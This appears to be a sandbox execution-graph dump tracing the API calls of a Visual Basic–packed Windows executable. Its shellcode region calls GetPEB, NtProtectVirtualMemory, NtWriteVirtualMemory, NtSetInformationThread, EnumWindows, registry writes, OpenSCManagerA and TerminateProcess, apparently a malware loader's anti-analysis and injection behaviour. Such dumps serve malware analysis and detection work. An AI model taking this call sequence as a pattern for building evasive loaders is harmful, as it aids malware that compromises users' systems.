                                      execution_graph 5070 20a1b0e 5071 20a1bf9 5070->5071 5072 20a8ec1 2 API calls 5071->5072 5073 20a1c04 5072->5073 5074 20a910c 5075 20a8ecb 5074->5075 5077 20a90eb 5074->5077 5076 20a7c59 GetPEB 5075->5076 5076->5077 5078 20a95a7 5077->5078 5079 20a958c OpenSCManagerA 5077->5079 5080 20a959b 5079->5080 5080->5080 4762 20a0000 4763 20a01d2 4762->4763 4766 20a8b34 4763->4766 4765 20a0719 4767 20a32a6 4766->4767 4769 20a8b47 4766->4769 4768 20a833c 15 API calls 4767->4768 4769->4765 5081 20a1100 5082 20a1076 5081->5082 5084 20a6f5a 15 API calls 5082->5084 5108 20a53fd 5082->5108 5083 20a7679 GetPEB 5087 20a8078 5083->5087 5085 20a123d 5084->5085 5086 20a6f5a 15 API calls 5085->5086 5088 20a1259 5086->5088 5089 20a8ec1 2 API calls 5088->5089 5090 20a1282 5089->5090 5091 20a12a8 5090->5091 5096 20a1402 5090->5096 5090->5108 5092 20a32a6 15 API calls 5091->5092 5097 20a12be 5091->5097 5092->5091 5093 20a3cc1 5094 20a179b 5098 20a17a5 15 API calls 5094->5098 5095 20a3c9d TerminateProcess 5096->5094 5100 20a833c 15 API calls 5096->5100 5097->5093 5097->5095 5099 20a41bc 5098->5099 5101 20a15aa 5100->5101 5102 20a1a87 2 API calls 5101->5102 5103 20a15b8 5102->5103 5104 20a1fa7 2 API calls 5103->5104 5105 20a15e1 5104->5105 5105->5093 5105->5094 5106 20a5378 5105->5106 5107 20a15fe 15 API calls 5106->5107 5109 20a537d 5107->5109 5108->5083 5109->5108 5110 20a1f51 3 API calls 5109->5110 5110->5108 5271 20a4984 5272 20a498b 5271->5272 5273 20a4a8c 5272->5273 5274 20a8ec1 2 API calls 5272->5274 5275 20a8ec1 2 API calls 5273->5275 5274->5273 5276 20a4aa0 5275->5276 4948 4118d3 __vbaChkstk 4949 411915 7 API calls 4948->4949 4950 4119b0 __vbaFreeVar __vbaFreeVar __vbaFreeStr __vbaFreeVar 4949->4950 4951 4119a3 #568 4949->4951 4951->4950 5111 20a3d19 5112 20a3e16 5111->5112 5113 20a2d8f GetPEB 5112->5113 5115 20a3e20 5113->5115 5114 20a7c59 GetPEB 5114->5115 5115->5114 4770 40e654 __vbaChkstk __vbaObjSetAddref 4771 40e69c 4770->4771 4772 40e6a7 __vbaHresultCheckObj 4771->4772 4773 40e6be 4771->4773 4774 40e6c2 __vbaObjSetAddref #644 4772->4774 4773->4774 4785 411d89 __vbaChkstk 4774->4785 4777 411d89 5 API calls 4778 40e6f6 4777->4778 4793 411c75 __vbaChkstk 4778->4793 4780 40e709 __vbaChkstk __vbaChkstk 4781 40e755 4780->4781 4782 40e760 __vbaHresultCheckObj 4781->4782 4783 40e77a __vbaFreeObj 4781->4783 4782->4783 4786 40e6e3 __vbaFreeObj 4785->4786 4787 411d9f 4785->4787 4786->4777 4795 411c0e __vbaChkstk 4787->4795 4790 411c0e 3 API calls 4791 411db6 4790->4791 4803 411d11 __vbaChkstk 4791->4803 4794 411c8c 4793->4794 4794->4780 4796 411c24 4795->4796 4797 411c42 4795->4797 4804 411b8c __vbaChkstk 4796->4804 4797->4790 4800 411b8c __vbaChkstk 4801 411c39 4800->4801 4806 411d39 __vbaChkstk 4801->4806 4803->4786 4805 411ba2 4804->4805 4805->4800 4807 411d54 4806->4807 4807->4797 5116 20a3d1e 5117 20a3cb8 5116->5117 5118 20a3d27 5116->5118 5119 20a2d8f GetPEB 5118->5119 5121 20a3e20 5119->5121 5120 20a7c59 GetPEB 5120->5121 5121->5120 4953 411ad7 __vbaChkstk 4954 411b17 #527 __vbaStrMove __vbaStrCmp __vbaFreeStr 4953->4954 4955 411b52 #569 4954->4955 4956 411b5c 4954->4956 4955->4956 4957 20a8692 4958 20a866c 4957->4958 4960 20a3cc1 4958->4960 4962 20a8b16 NtProtectVirtualMemory 4958->4962 4961 20a882f 4962->4961 4824 20a4016 4825 20a411e 4824->4825 4832 20a414a CreateFileA 4825->4832 4827 20a4127 4829 20a4134 2 API calls 4827->4829 4830 20a419a 4827->4830 4828 20a7679 GetPEB 4831 20a8078 4828->4831 4829->4830 4830->4828 4832->4827 5122 20a0917 5123 20a091b 5122->5123 5124 20a08ac 5122->5124 5125 20a833c 15 API calls 5123->5125 5126 20a0a55 5125->5126 5127 20a6f5a 15 API calls 5126->5127 5128 20a0a66 NtSetInformationThread 5127->5128 5129 20a3ff8 15 API calls 5128->5129 5130 20a0a81 5129->5130 5131 20a6f5a 15 API calls 5130->5131 5132 20a0a93 5131->5132 5133 20a0bd7 15 API calls 5132->5133 5134 20a51a7 5133->5134 5135 20a8517 5136 20a8607 5135->5136 5137 20a8832 5136->5137 5147 20a865d 5136->5147 5140 20a89a5 5137->5140 5141 20a8858 5137->5141 5139 20a8a03 5150 20a8b16 NtProtectVirtualMemory 5140->5150 5149 20a8b16 NtProtectVirtualMemory 5141->5149 5144 20a3cc1 5145 20a882f 5146 20a899f 5147->5144 5148 20a8b16 NtProtectVirtualMemory 5147->5148 5148->5145 5149->5146 5150->5139 5151 41115c __vbaChkstk 5152 41119c __vbaVarDup 5151->5152 5153 4111b0 __vbaNew2 5152->5153 5154 4111c8 __vbaObjSet 5152->5154 5153->5154 5156 4111fd 5154->5156 5157 411222 5156->5157 5158 411208 __vbaHresultCheckObj 5156->5158 5159 411226 __vbaFreeObj 5157->5159 5158->5159 5160 41123e __vbaFreeVar 5159->5160 4752 20a1c14 RegCreateKeyExA 4753 20a1c5d 4752->4753 4760 20a1c64 RegSetValueExA 4753->4760 4756 20a1f51 3 API calls 4757 20a53fd 4756->4757 4758 20a7679 GetPEB 4757->4758 4759 20a8078 4758->4759 4761 20a1d6c 4760->4761 4761->4756 4863 20a1615 4864 20a15b0 4863->4864 4865 20a161f 4863->4865 4866 20a1fa7 2 API calls 4865->4866 4867 20a1795 4866->4867 4868 20a17a5 15 API calls 4867->4868 4869 20a41bc 4868->4869 4085 20a0aaa 4086 20a0a98 4085->4086 4089 20a0bd7 4086->4089 4136 20a6f5a 4089->4136 4091 20a0bef 4092 20a6f5a 14 API calls 4091->4092 4099 20a0c07 4092->4099 4093 20a0dca 4194 20a3cad GetPEB 4093->4194 4096 20a0ddd 4097 20a6f5a 14 API calls 4096->4097 4098 20a0ef1 4097->4098 4196 20a8ec1 4098->4196 4099->4093 4104 20a32a6 4099->4104 4133 20a53fd 4099->4133 4150 20a0d52 4099->4150 4198 20a833c 4104->4198 4111 20a8078 4231 20a7679 GetPEB 4133->4231 4137 20a70a8 LoadLibraryA 4136->4137 4138 20a6f68 4136->4138 4139 20a70b3 4137->4139 4140 20a7679 GetPEB 4138->4140 4139->4091 4141 20a706a 4140->4141 4142 20a709b 4141->4142 4143 20a08f9 4141->4143 4144 20a7086 4141->4144 4142->4137 4233 20a08d5 4143->4233 4146 20a7679 GetPEB 4144->4146 4148 20a708c 4146->4148 4147 20a08fe 4147->4091 4148->4142 4149 20a7679 GetPEB 4148->4149 4149->4142 4154 20a0c15 4150->4154 4151 20a7679 GetPEB 4156 20a8078 4151->4156 4152 20a32a6 4153 20a833c 14 API calls 4152->4153 4154->4150 4154->4152 4155 20a0dca 4154->4155 4158 20a0d52 14 API calls 4154->4158 4193 20a53fd 4154->4193 4157 20a3cad GetPEB 4155->4157 4159 20a0ddd 4157->4159 4158->4154 4160 20a6f5a 14 API calls 4159->4160 4161 20a0ef1 4160->4161 4162 20a8ec1 2 API calls 4161->4162 4163 20a0f05 4162->4163 4164 20a6f5a 14 API calls 4163->4164 4171 20a104a 4163->4171 4165 20a0f24 4164->4165 4168 20a8ec1 2 API calls 4165->4168 4165->4171 4166 20a6f5a 14 API calls 4167 20a123d 4166->4167 4169 20a6f5a 14 API calls 4167->4169 4168->4171 4170 20a1259 4169->4170 4172 20a8ec1 2 API calls 4170->4172 4171->4166 4171->4193 4173 20a1282 4172->4173 4174 20a12a8 4173->4174 4179 20a1402 4173->4179 4173->4193 4180 20a12be 4174->4180 4276 20a32a6 4174->4276 4176 20a3cc1 4176->4099 4177 20a179b 4295 20a17a5 4177->4295 4178 20a3c9d TerminateProcess 4178->4099 4179->4177 4183 20a833c 14 API calls 4179->4183 4180->4176 4180->4178 4184 20a15aa 4183->4184 4278 20a1a87 4184->4278 4189 20a5378 4299 20a15fe 4189->4299 4193->4151 4195 20a3cb8 4194->4195 4195->4096 4354 20a8ec6 4196->4354 4199 20a6f5a 13 API calls 4198->4199 4200 20a8349 4199->4200 4201 20a6f5a 13 API calls 4200->4201 4202 20a835a 4201->4202 4203 20a8363 GetPEB 4202->4203 4204 20a8476 4203->4204 4205 20a6f5a 4204->4205 4206 20a8485 4204->4206 4207 20a70a8 LoadLibraryA 4205->4207 4210 20a7679 GetPEB 4205->4210 4361 20a8b16 NtProtectVirtualMemory 4206->4361 4209 20a70b3 4207->4209 4212 20a706a 4210->4212 4211 20a3cc1 4214 20a709b 4212->4214 4215 20a08f9 4212->4215 4216 20a7086 4212->4216 4213 20a84c3 4213->4211 4221 20a8832 4213->4221 4230 20a865d 4213->4230 4214->4207 4217 20a08d5 13 API calls 4215->4217 4218 20a7679 GetPEB 4216->4218 4219 20a08fe 4217->4219 4220 20a708c 4218->4220 4220->4214 4222 20a7679 GetPEB 4220->4222 4225 20a89a5 4221->4225 4226 20a8858 4221->4226 4222->4214 4224 20a8a03 4364 20a8b16 NtProtectVirtualMemory 4225->4364 4363 20a8b16 NtProtectVirtualMemory 4226->4363 4229 20a899f 4230->4211 4362 20a8b16 NtProtectVirtualMemory 4230->4362 4232 20a768d 4231->4232 4232->4111 4234 20a08e6 EnumWindows 4233->4234 4237 20a3cc1 4233->4237 4235 20a090f 4234->4235 4236 20a08ef 4234->4236 4239 20a6f5a 13 API calls 4235->4239 4238 20a08d5 13 API calls 4236->4238 4237->4147 4237->4237 4240 20a08fe 4238->4240 4241 20a0a2b 4239->4241 4240->4147 4242 20a833c 13 API calls 4241->4242 4243 20a0a55 4242->4243 4244 20a6f5a 13 API calls 4243->4244 4245 20a0a66 NtSetInformationThread 4244->4245 4253 20a3ff8 4245->4253 4254 20a6f5a 15 API calls 4253->4254 4255 20a4005 4254->4255 4261 20a4010 4255->4261 4262 20a411e 4261->4262 4269 20a414a CreateFileA 4262->4269 4264 20a4127 4267 20a419a 4264->4267 4270 20a4134 4264->4270 4265 20a7679 GetPEB 4268 20a8078 4265->4268 4267->4265 4269->4264 4275 20a414a CreateFileA 4270->4275 4272 20a413d 4272->4267 4273 20a7679 GetPEB 4272->4273 4274 20a8078 4273->4274 4275->4272 4277 20a833c 15 API calls 4276->4277 4279 20a8ec1 2 API calls 4278->4279 4280 20a1aad 4279->4280 4281 20a15b8 4280->4281 4282 20a8ec1 2 API calls 4280->4282 4287 20a1fa7 4281->4287 4283 20a1ad4 4282->4283 4284 20a8ec1 2 API calls 4283->4284 4285 20a1b06 4284->4285 4286 20a8ec1 2 API calls 4285->4286 4286->4281 4288 20a209c 4287->4288 4289 20a8ec1 2 API calls 4288->4289 4290 20a20c2 4289->4290 4291 20a8ec1 2 API calls 4290->4291 4293 20a15e1 4290->4293 4292 20a211e 4291->4292 4292->4293 4294 20a8ec1 2 API calls 4292->4294 4293->4176 4293->4177 4293->4189 4294->4293 4297 20a18b9 4295->4297 4311 20a457e 4297->4311 4315 20a2259 4297->4315 4300 20a1601 4299->4300 4301 20a1fa7 2 API calls 4300->4301 4302 20a1795 4301->4302 4303 20a17a5 15 API calls 4302->4303 4304 20a41bc 4303->4304 4304->4193 4305 20a1f51 4304->4305 4306 20a1f59 4305->4306 4307 20a457e LdrInitializeThunk 4306->4307 4308 20a1f88 4307->4308 4309 20a1fa7 2 API calls 4308->4309 4310 20a1fa6 4309->4310 4310->4193 4312 20a5075 4311->4312 4313 20a507c LdrInitializeThunk 4312->4313 4314 20a50e5 4312->4314 4313->4297 4316 20a6f5a 14 API calls 4315->4316 4317 20a226f 4316->4317 4318 20a08f9 4317->4318 4321 20a23f5 4317->4321 4319 20a08d5 14 API calls 4318->4319 4320 20a08fe 4319->4320 4320->4297 4322 20a8ec1 2 API calls 4321->4322 4323 20a25b7 4321->4323 4322->4321 4324 20a291f GetPEB 4323->4324 4326 20a2940 4324->4326 4325 20a2ae1 4332 20a2c10 4325->4332 4326->4325 4328 20a8ec1 2 API calls 4326->4328 4330 20a2aba 4326->4330 4328->4326 4331 20a8ec1 2 API calls 4330->4331 4331->4325 4333 20a2c23 4332->4333 4333->4333 4334 20a2c2d GetPEB 4333->4334 4335 20a8ec1 2 API calls 4334->4335 4336 20a2c5f 4335->4336 4337 20a2bf2 4336->4337 4338 20a2c64 4336->4338 4340 20a2c10 2 API calls 4337->4340 4339 20a8ec1 2 API calls 4338->4339 4342 20a2c76 4339->4342 4341 20a9702 4340->4341 4346 20a2d8f 4342->4346 4347 20a2db2 4346->4347 4348 20a2d8f GetPEB 4347->4348 4350 20a3e20 4348->4350 4351 20a7c59 4350->4351 4352 20a7679 GetPEB 4351->4352 4353 20a7c66 4352->4353 4353->4350 4355 20a8ecb 4354->4355 4356 20a7c59 GetPEB 4355->4356 4357 20a90eb 4356->4357 4358 20a95a7 4357->4358 4359 20a958c OpenSCManagerA 4357->4359 4360 20a959b 4359->4360 4360->4360 4361->4213 4362->4211 4363->4229 4364->4224 4366 20a652a 4367 20a6460 4366->4367 4370 20a6533 4366->4370 4368 20a64cf 4367->4368 4369 20a63f4 GetLongPathNameW 4367->4369 4369->4368 4963 4114e0 __vbaChkstk 4964 411520 __vbaVarDup __vbaI2Str 4963->4964 4965 4115b7 __vbaFreeStr __vbaFreeVar 4964->4965 4966 41153b 4964->4966 4968 411544 __vbaNew2 4966->4968 4969 41155c 4966->4969 4968->4969 4970 411587 __vbaHresultCheckObj 4969->4970 4971 41159e 4969->4971 4972 4115a2 __vbaStrMove 4970->4972 4971->4972 4972->4965 4973 20a3eaf 4974 20a3eb3 4973->4974 4975 20a3e20 4973->4975 4976 20a7c59 GetPEB 4975->4976 4976->4975 4870 411266 __vbaChkstk 4871 4112a6 __vbaVarDup __vbaStrCopy __vbaVarDup #562 __vbaFreeVar 4870->4871 4872 411300 4871->4872 4873 4113d3 __vbaFreeVar __vbaFreeStr 4871->4873 4874 411321 __vbaObjSet 4872->4874 4875 411309 __vbaNew2 4872->4875 4878 41135a 4874->4878 4875->4874 4879 411365 __vbaHresultCheckObj 4878->4879 4880 41137f 4878->4880 4881 411383 7 API calls 4879->4881 4880->4881 4881->4873 4412 20a1da2 4413 20a1dba 4412->4413 4416 20a63fa GetLongPathNameW 4413->4416 4415 20a1dcd 4417 20a6514 4416->4417 4417->4415 5280 20a89a2 5283 20a89a5 5280->5283 5282 20a8a03 5284 20a8b16 NtProtectVirtualMemory 5283->5284 5284->5282 4743 20a38a7 4744 20a3997 NtWriteVirtualMemory 4743->4744 4745 20a39a7 4744->4745 4746 20a8ec1 2 API calls 4745->4746 4747 20a39ca 4746->4747 4748 20a8ec1 2 API calls 4747->4748 4749 20a39f7 4748->4749 4750 20a8ec1 2 API calls 4749->4750 4751 20a3a11 4750->4751 5285 20a3ba5 5286 20a3c9a TerminateProcess 5285->5286 4371 20a95b9 4372 20a95c3 4371->4372 4373 20a9554 4371->4373 4374 20a95a7 4373->4374 4375 20a958c OpenSCManagerA 4373->4375 4376 20a959b 4375->4376 4376->4376 5161 20a2939 5162 20a2940 5161->5162 5163 20a2ae1 5162->5163 5165 20a8ec1 2 API calls 5162->5165 5167 20a2aba 5162->5167 5164 20a2c10 3 API calls 5163->5164 5166 20a9702 5164->5166 5165->5162 5168 20a8ec1 2 API calls 5167->5168 5168->5163 5288 4115f7 __vbaChkstk 5289 411637 __vbaStrCopy __vbaVarDup #586 __vbaFpR8 5288->5289 5290 41167b __vbaFreeStr __vbaFreeVar 5289->5290 4418 20a47b3 4419 20a474c 4418->4419 4422 20a4797 4418->4422 4420 20a0bc9 4419->4420 4421 20a8ec1 2 API calls 4419->4421 4426 20a0bd7 15 API calls 4420->4426 4421->4422 4422->4420 4423 20a090f 4422->4423 4424 20a48f5 4422->4424 4425 20a6f5a 15 API calls 4423->4425 4424->4420 4428 20a8ec1 2 API calls 4424->4428 4431 20a496d 4424->4431 4429 20a0a2b 4425->4429 4427 20a51a7 4426->4427 4428->4424 4430 20a833c 15 API calls 4429->4430 4432 20a0a55 4430->4432 4433 20a8ec1 2 API calls 4431->4433 4434 20a6f5a 15 API calls 4432->4434 4435 20a4a8c 4433->4435 4436 20a0a66 NtSetInformationThread 4434->4436 4437 20a8ec1 2 API calls 4435->4437 4438 20a3ff8 15 API calls 4436->4438 4440 20a4aa0 4437->4440 4439 20a0a81 4438->4439 4441 20a6f5a 15 API calls 4439->4441 4442 20a0a93 4441->4442 4442->4420 5291 20a1fb0 5292 20a1fb7 5291->5292 5293 20a8ec1 2 API calls 5292->5293 5294 20a20c2 5292->5294 5293->5294 5295 20a8ec1 2 API calls 5294->5295 5297 20a2246 5294->5297 5296 20a211e 5295->5296 5296->5297 5298 20a8ec1 2 API calls 5296->5298 5298->5297 4882 20a9436 4883 20a95a7 4882->4883 4884 20a9548 4882->4884 4884->4883 4885 20a958c OpenSCManagerA 4884->4885 4886 20a959b 4885->4886 4886->4886 5299 20a17b5 5300 20a1795 5299->5300 5301 20a1750 5299->5301 5302 20a17a5 15 API calls 5300->5302 5304 20a1fa7 2 API calls 5301->5304 5303 20a41bc 5302->5303 5304->5300 4365 401480 #100 5169 20a0f4a 5170 20a8ec1 2 API calls 5169->5170 5173 20a104a 5170->5173 5171 20a6f5a 15 API calls 5172 20a123d 5171->5172 5175 20a6f5a 15 API calls 5172->5175 5173->5171 5197 20a53fd 5173->5197 5174 20a7679 GetPEB 5180 20a8078 5174->5180 5176 20a1259 5175->5176 5177 20a8ec1 2 API calls 5176->5177 5178 20a1282 5177->5178 5179 20a12a8 5178->5179 5185 20a1402 5178->5185 5178->5197 5181 20a32a6 15 API calls 5179->5181 5186 20a12be 5179->5186 5181->5179 5182 20a3cc1 5183 20a179b 5187 20a17a5 15 API calls 5183->5187 5184 20a3c9d TerminateProcess 5185->5183 5189 20a833c 15 API calls 5185->5189 5186->5182 5186->5184 5188 20a41bc 5187->5188 5190 20a15aa 5189->5190 5191 20a1a87 2 API calls 5190->5191 5192 20a15b8 5191->5192 5193 20a1fa7 2 API calls 5192->5193 5194 20a15e1 5193->5194 5194->5182 5194->5183 5195 20a5378 5194->5195 5196 20a15fe 15 API calls 5195->5196 5198 20a537d 5196->5198 5197->5174 5198->5197 5199 20a1f51 3 API calls 5198->5199 5199->5197 5200 20a474b 5201 20a474c 5200->5201 5202 20a0a93 5201->5202 5203 20a8ec1 2 API calls 5201->5203 5204 20a0bd7 15 API calls 5202->5204 5206 20a4797 5203->5206 5205 20a51a7 5204->5205 5206->5202 5207 20a090f 5206->5207 5211 20a48f5 5206->5211 5208 20a6f5a 15 API calls 5207->5208 5209 20a0a2b 5208->5209 5212 20a833c 15 API calls 5209->5212 5210 20a8ec1 2 API calls 5210->5211 5211->5202 5211->5210 5213 20a496d 5211->5213 5214 20a0a55 5212->5214 5215 20a8ec1 2 API calls 5213->5215 5216 20a6f5a 15 API calls 5214->5216 5217 20a4a8c 5215->5217 5218 20a0a66 NtSetInformationThread 5216->5218 5219 20a8ec1 2 API calls 5217->5219 5220 20a3ff8 15 API calls 5218->5220 5222 20a4aa0 5219->5222 5221 20a0a81 5220->5221 5223 20a6f5a 15 API calls 5221->5223 5223->5202 4887 20a9248 4888 20a8ecb 4887->4888 4889 20a90eb 4887->4889 4888->4887 4888->4889 4890 20a7c59 GetPEB 4888->4890 4889->4889 4891 20a95a7 4889->4891 4892 20a958c OpenSCManagerA 4889->4892 4890->4889 4893 20a959b 4892->4893 4893->4893 4982 20a08c8 4983 20a6f5a 15 API calls 4982->4983 4984 20a08d3 4983->4984 4985 20a08d5 15 API calls 4984->4985 4986 20a08fe 4985->4986 4894 411005 6 API calls 4895 4110a5 4894->4895 4896 41111b __vbaAryDestruct 4894->4896 4898 4110c6 4895->4898 4899 4110ae __vbaNew2 4895->4899 4900 4110cd __vbaObjSetAddref 4898->4900 4899->4900 4901 4110ed 4900->4901 4902 4110f8 __vbaHresultCheckObj 4901->4902 4903 41110f 4901->4903 4904 411113 __vbaFreeObj 4902->4904 4903->4904 4904->4896 4987 20a22ce 4988 20a08f9 4987->4988 4991 20a23f5 4987->4991 4989 20a08d5 15 API calls 4988->4989 4990 20a08fe 4989->4990 4992 20a8ec1 2 API calls 4991->4992 4995 20a25b7 4991->4995 4992->4991 4993 20a291f GetPEB 4994 20a2940 4993->4994 4996 20a2ae1 4994->4996 4998 20a8ec1 2 API calls 4994->4998 5000 20a2aba 4994->5000 4995->4993 4997 20a2c10 3 API calls 4996->4997 4999 20a9702 4997->4999 4998->4994 5001 20a8ec1 2 API calls 5000->5001 5001->4996 5002 20a34cd 5003 20a3468 5002->5003 5004 20a8ec1 2 API calls 5003->5004 5005 20a3658 5004->5005 5006 20a8ec1 2 API calls 5005->5006 5007 20a36a7 5006->5007 5008 20a8ec1 2 API calls 5007->5008 5009 20a37fd 5008->5009 5010 20a3997 NtWriteVirtualMemory 5009->5010 5011 20a39a7 5010->5011 5012 20a8ec1 2 API calls 5011->5012 5013 20a39ca 5012->5013 5014 20a8ec1 2 API calls 5013->5014 5015 20a39f7 5014->5015 5016 20a8ec1 2 API calls 5015->5016 5017 20a3a11 5016->5017 5224 20a6f42 GetPEB 5018 20a12c3 5019 20a125c 5018->5019 5024 20a12be 5018->5024 5020 20a8ec1 2 API calls 5019->5020 5025 20a1282 5020->5025 5021 20a3cc1 5022 20a3c9d TerminateProcess 5023 20a7679 GetPEB 5028 20a8078 5023->5028 5024->5021 5024->5022 5026 20a12a8 5025->5026 5032 20a1402 5025->5032 5041 20a53fd 5025->5041 5026->5024 5027 20a32a6 15 API calls 5026->5027 5027->5026 5029 20a179b 5030 20a17a5 15 API calls 5029->5030 5031 20a41bc 5030->5031 5032->5029 5033 20a833c 15 API calls 5032->5033 5034 20a15aa 5033->5034 5035 20a1a87 2 API calls 5034->5035 5036 20a15b8 5035->5036 5037 20a1fa7 2 API calls 5036->5037 5038 20a15e1 5037->5038 5038->5021 5038->5029 5039 20a5378 5038->5039 5040 20a15fe 15 API calls 5039->5040 5042 20a537d 5040->5042 5041->5023 5042->5041 5043 20a1f51 3 API calls 5042->5043 5043->5041 5050 410e93 __vbaChkstk 5051 410ed3 __vbaVarDup #586 __vbaFpR8 __vbaFreeVar 5050->5051 4905 20a265e 4908 20a2642 4905->4908 4906 20a291f GetPEB 4907 20a2940 4906->4907 4909 20a2ae1 4907->4909 4911 20a8ec1 2 API calls 4907->4911 4913 20a2aba 4907->4913 4908->4906 4910 20a2c10 3 API calls 4909->4910 4912 20a9702 4910->4912 4911->4907 4914 20a8ec1 2 API calls 4913->4914 4914->4909 5052 401295 __vbaExceptHandler 5233 20a195f 5234 20a194c 5233->5234 5236 20a18e5 5233->5236 5235 20a2259 15 API calls 5235->5236 5236->5235 5237 20a457e LdrInitializeThunk 5236->5237 5237->5236 5319 411796 __vbaChkstk __vbaStrCopy 5320 4117f6 5319->5320 5321 4117de __vbaNew2 5319->5321 5322 41181f __vbaHresultCheckObj 5320->5322 5323 411836 5320->5323 5321->5320 5322->5323 5324 411877 5323->5324 5325 41185d __vbaHresultCheckObj 5323->5325 5326 41187b __vbaFreeObj 5324->5326 5325->5326 5327 4118ad __vbaFreeStr 5326->5327 4915 411a18 __vbaChkstk 4916 411a58 #521 __vbaStrMove __vbaStrCmp __vbaFreeStr 4915->4916 4917 411a93 #532 4916->4917 4918 411a9d 4916->4918 4917->4918 4443 20a36d0 4444 20a36a7 4443->4444 4445 20a366c 4443->4445 4447 20a8ec1 2 API calls 4444->4447 4445->4444 4446 20a8ec1 2 API calls 4445->4446 4446->4444 4448 20a37fd 4447->4448 4449 20a3997 NtWriteVirtualMemory 4448->4449 4450 20a39a7 4449->4450 4451 20a8ec1 2 API calls 4450->4451 4452 20a39ca 4451->4452 4453 20a8ec1 2 API calls 4452->4453 4454 20a39f7 4453->4454 4455 20a8ec1 2 API calls 4454->4455 4456 20a3a11 4455->4456 5328 20a0dea 5329 20a0ee2 5328->5329 5330 20a6f5a 15 API calls 5329->5330 5331 20a0ef1 5330->5331 5332 20a8ec1 2 API calls 5331->5332 5333 20a0f05 5332->5333 5334 20a6f5a 15 API calls 5333->5334 5341 20a104a 5333->5341 5335 20a0f24 5334->5335 5338 20a8ec1 2 API calls 5335->5338 5335->5341 5336 20a6f5a 15 API calls 5337 20a123d 5336->5337 5339 20a6f5a 15 API calls 5337->5339 5338->5341 5340 20a1259 5339->5340 5342 20a8ec1 2 API calls 5340->5342 5341->5336 5365 20a53fd 5341->5365 5344 20a1282 5342->5344 5343 20a7679 GetPEB 5347 20a8078 5343->5347 5345 20a12a8 5344->5345 5351 20a1402 5344->5351 5344->5365 5346 20a32a6 15 API calls 5345->5346 5352 20a12be 5345->5352 5346->5345 5348 20a3cc1 5349 20a179b 5353 20a17a5 15 API calls 5349->5353 5350 20a3c9d TerminateProcess 5351->5349 5355 20a833c 15 API calls 5351->5355 5352->5348 5352->5350 5354 20a41bc 5353->5354 5356 20a15aa 5355->5356 5357 20a1a87 2 API calls 5356->5357 5358 20a15b8 5357->5358 5359 20a1fa7 2 API calls 5358->5359 5360 20a15e1 5359->5360 5360->5348 5360->5349 5361 20a5378 5360->5361 5362 20a15fe 15 API calls 5361->5362 5363 20a537d 5362->5363 5364 20a1f51 3 API calls 5363->5364 5363->5365 5364->5365 5365->5343 5238 20a7d68 5239 20a7d9a 5238->5239 5240 20a7679 GetPEB 5239->5240 5241 20a3cc1 5239->5241 5240->5241 5242 410f23 __vbaChkstk #588 5243 410f62 5242->5243 5246 410fd8 5242->5246 5244 410f83 5243->5244 5245 410f6b __vbaNew2 5243->5245 5247 410f8a __vbaObjSetAddref 5244->5247 5245->5247 5248 410faa 5247->5248 5249 410fb5 __vbaHresultCheckObj 5248->5249 5250 410fcc 5248->5250 5251 410fd0 __vbaFreeObj 5249->5251 5250->5251 5251->5246 5252 20a6f6e 5253 20a705d 5252->5253 5254 20a7679 GetPEB 5253->5254 5255 20a706a 5254->5255 5256 20a08f9 5255->5256 5257 20a7086 5255->5257 5258 20a709b 5255->5258 5259 20a08d5 15 API calls 5256->5259 5260 20a7679 GetPEB 5257->5260 5261 20a70a8 LoadLibraryA 5258->5261 5262 20a08fe 5259->5262 5263 20a708c 5260->5263 5264 20a70b3 5261->5264 5263->5258 5265 20a7679 GetPEB 5263->5265 5265->5258 4457 40e7aa __vbaChkstk 4458 40e7fe #670 __vbaVarTstEq __vbaFreeVar 4457->4458 4459 40e860 4458->4459 4460 40e953 __vbaChkstk 4458->4460 4461 40e870 __vbaNew2 4459->4461 4462 40e88b __vbaObjSet 4459->4462 4463 40e9cb 4460->4463 4461->4462 4468 40e8d6 4462->4468 4464 40e9fa 4463->4464 4465 40e9da __vbaHresultCheckObj 4463->4465 4467 40ea01 __vbaFreeVar 4464->4467 4465->4467 4469 40ea28 4467->4469 4470 40e8e7 __vbaHresultCheckObj 4468->4470 4471 40e90a 4468->4471 4472 40ea41 __vbaNew2 4469->4472 4473 40ea5c __vbaObjSet 4469->4473 4474 40e911 #529 __vbaFreeObj __vbaFreeVar 4470->4474 4471->4474 4472->4473 4476 40eaa7 4473->4476 4474->4460 4477 40ead8 4476->4477 4478 40eab8 __vbaHresultCheckObj 4476->4478 4479 40eb03 __vbaObjSet 4477->4479 4480 40eae8 __vbaNew2 4477->4480 4478->4477 4482 40eb54 4479->4482 4480->4479 4483 40eb65 __vbaHresultCheckObj 4482->4483 4484 40eb88 4482->4484 4485 40eb8f __vbaLateIdCallLd 4483->4485 4484->4485 4486 40ebb1 __vbaNew2 4485->4486 4487 40ebcc __vbaObjSet 4485->4487 4486->4487 4489 40ec1d 4487->4489 4490 40ec51 4489->4490 4491 40ec2e __vbaHresultCheckObj 4489->4491 4492 40ec58 __vbaStrVarMove __vbaStrMove __vbaVarDup 4490->4492 4491->4492 4493 40ed0d __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4492->4493 4494 40ed60 __vbaNew2 4493->4494 4495 40ed7b __vbaObjSet 4493->4495 4494->4495 4497 40edc9 4495->4497 4498 40edda __vbaHresultCheckObj 4497->4498 4499 40edfd 4497->4499 4500 40ee04 __vbaLateIdCallLd 4498->4500 4499->4500 4501 40ee41 __vbaObjSet 4500->4501 4502 40ee26 __vbaNew2 4500->4502 4504 40ee8f 4501->4504 4502->4501 4505 40eea0 __vbaHresultCheckObj 4504->4505 4506 40eec3 4504->4506 4505->4506 4507 40eed3 __vbaNew2 4506->4507 4508 40eeee __vbaObjSet 4506->4508 4507->4508 4510 40ef3f 4508->4510 4511 40ef50 __vbaHresultCheckObj 4510->4511 4512 40ef73 4510->4512 4513 40ef7a __vbaLateIdCallLd 4511->4513 4512->4513 4514 40efb7 __vbaObjSet 4513->4514 4515 40ef9c __vbaNew2 4513->4515 4517 40f005 4514->4517 4515->4514 4518 40f016 __vbaHresultCheckObj 4517->4518 4519 40f039 4517->4519 4518->4519 4520 40f064 __vbaObjSet 4519->4520 4521 40f049 __vbaNew2 4519->4521 4523 40f0b5 4520->4523 4521->4520 4524 40f0c6 __vbaHresultCheckObj 4523->4524 4525 40f0e9 4523->4525 4526 40f0f0 __vbaStrMove __vbaI4Var __vbaI4Var __vbaChkstk 4524->4526 4525->4526 4527 40f1d4 4526->4527 4528 40f203 4527->4528 4529 40f1e3 __vbaHresultCheckObj 4527->4529 4530 40f20a __vbaFreeStr __vbaFreeObjList __vbaFreeVarList 4528->4530 4529->4530 4531 40f294 